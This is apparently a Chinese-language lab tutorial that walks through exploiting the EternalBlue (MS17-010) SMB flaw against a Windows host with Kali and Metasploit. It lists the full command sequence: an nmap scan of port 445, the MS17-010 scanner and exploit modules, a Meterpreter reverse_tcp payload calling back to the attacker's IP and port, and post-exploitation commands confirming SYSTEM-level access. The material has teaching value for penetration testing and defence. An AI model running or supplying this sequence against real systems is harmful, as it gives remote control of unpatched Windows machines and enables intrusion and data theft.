1. 探測目標主機系統及445端口是否開放
nmap -sV -T4 192.168.205.200
下圖可以看到windos已開啟445端口
2. 打開kali的滲透測試工具Metasploit
msfconsole
3. 搜索永恆之藍漏洞名
search smb_ms17_010
使用此模塊,並設置被攻擊主機IP
use auxiliary/scanner/smb/smb_ms17_010 show options
設置被攻擊的主機IP
set RHOSTS 192.168.205.200
4. 運行看是否存在永恆之藍漏洞(下圖顯示目標主機存在此漏洞)
run
5. 使用攻擊模塊設置被攻擊主機IP
use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.205.200
6. 設置攻擊載荷(kali所在主機IP及監聽端口
# 攻擊載荷 set payload windows/x64/meterpreter/reverse_tcp # 攻擊機IP(kali主機) set lhost 192.168.205.173 # 攻擊機監聽端口 set lport 6666 # 查看設置的參數 show options
7. 執行攻擊命令(下圖顯示已經入侵到windows系統)
exploit
可以使用?查看幫助命令
sysinfo # 系統相關信息 getuid # 查看當前用戶身份權限,下圖可以看到已取得了系統級別權限
8. 可以使用像linux一樣的命令查看,切換目錄